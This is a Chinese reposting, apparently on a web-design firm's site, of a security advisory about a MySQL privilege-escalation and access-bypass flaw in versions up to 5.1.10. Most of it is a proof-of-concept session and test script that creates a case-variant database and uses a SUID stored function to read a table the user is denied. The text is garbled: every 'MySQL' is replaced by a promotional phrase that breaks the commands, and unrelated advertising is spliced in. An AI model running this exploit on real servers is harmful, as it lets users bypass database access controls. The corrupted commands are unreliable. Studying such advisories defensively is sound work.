以下的文章主要讲述的是MySQL权限提升与安全限制绕过漏洞的实际应用,我前几天在相关网站看见MySQL权限提升与安全限制绕过漏洞的实际应用的资料,觉得挺好,今天就拿出来供大家分享。
10年积累的成都网站制作、成都网站设计经验,可以快速应对客户对网站的新想法和需求。提供各种问题对应的解决方案。让选择我们的客户得到更好、更有力的网络服务。我虽然不认识你,你也不认识我。但先做网站后付款的网站建设流程,更有昌都免费网站建设让你可以放心的选择与我们合作。
受影响系统:
MySQL(和PHP搭配之最佳组合) AB MySQL(和PHP搭配之最佳组合) <= 5.1.10
描述:
BUGTRAQ ID: 19559
MySQL(和PHP搭配之最佳组合)是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
在MySQL(和PHP搭配之最佳组合)上,拥有访问权限但无创建权限的用户可以创建与所访问数据库仅有名称字母大小写区别的新数据库。成功利用这个漏洞要求运行MySQL(和PHP搭配之最佳组合)的文件系统支持区分大小写的文件名。
此外,由于在错误的安全环境中计算了suid例程的参数,攻击者可以通过存储的例程以例程定义者的权限执行任意DML语句。成功攻击要求用户对所存储例程拥有EXECUTE权限。
测试方法:
【警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!】
1、创建数据库
- $ MySQL(和PHP搭配之最佳组合) -h my.MySQL(和PHP搭配之最佳组合).server -u sample -p -A sample
- Enter password:
- Welcome to the MySQL(和PHP搭配之最佳组合) monitor. Commands end with ; or \g.
- Your MySQL(和PHP搭配之最佳组合) connection id is 263935 to server version: 4.1.16-standard
- MySQL(和PHP搭配之最佳组合)> create database another;
- ERROR 1044: Access denied for user 'sample'@'%' to database 'another'
- MySQL(和PHP搭配之最佳组合)> create database sAmple;
- Query OK, 1 row affected (0.00 sec)
2、权限提升
- --disable_warnings
- drop database if exists MySQL(和PHP搭配之最佳组合)test1;
- drop database if exists MySQL(和PHP搭配之最佳组合)test2;
- drop function if exists f_suid;
- --enable_warnings
- # Prepare playground
- create database MySQL(和PHP搭配之最佳组合)test1;
- create database MySQL(和PHP搭配之最佳组合)test2;
- create user malory@localhost;
- grant all privileges on MySQL(和PHP搭配之最佳组合)test1.* to malory@localhost;
- # Create harmless (but SUID!) function
- create function f_suid(i int) returns int return 0;
- grant execute on function test.f_suid to malory@localhost;
- use MySQL(和PHP搭配之最佳组合)test2;
- # Create table in which malory@localhost will be interested but to which
- # he won't have any access
- create table t1 (i int);
- connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳组合)test1);
- # Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳组合)test2.t1
- --error ER_TABLEACCESS_DENIED_ERROR
- select * from MySQL(和PHP搭配之最佳组合)test2.t1;
- # Create function which will allow to exploit security hole
- delimiter |;
- create function f_evil ()
- returns int
- sql security invoker
- begin
- set @a:= current_user();
- set @b:= (select count(*) from MySQL(和PHP搭配之最佳组合)test2.t1);
- return 0;
- end|
- delimiter ;|
- # Again correct
- --error ER_TABLEACCESS_DENIED_ERROR
- select f_evil();
- select @a, @b;
- # Oops!!! it seems that f_evil() is executed in the context of
- # f_suid() definer, so malory@locahost gets all info that he wants
- select test.f_suid(f_evil());
- select @a, @b;
- connection default;
- drop user malory@localhost;
- drop database MySQL(和PHP搭配之最佳组合)test1;
- drop database MySQL(和PHP搭配之最佳组合)test2;
建议:
厂商补丁:MySQL(和PHP搭配之最佳组合) AB,目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载。
分享文章:MySQL权限提升与安全限制问题探讨
当前链接:http://www.shufengxianlan.com/qtweb/news37/107137.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联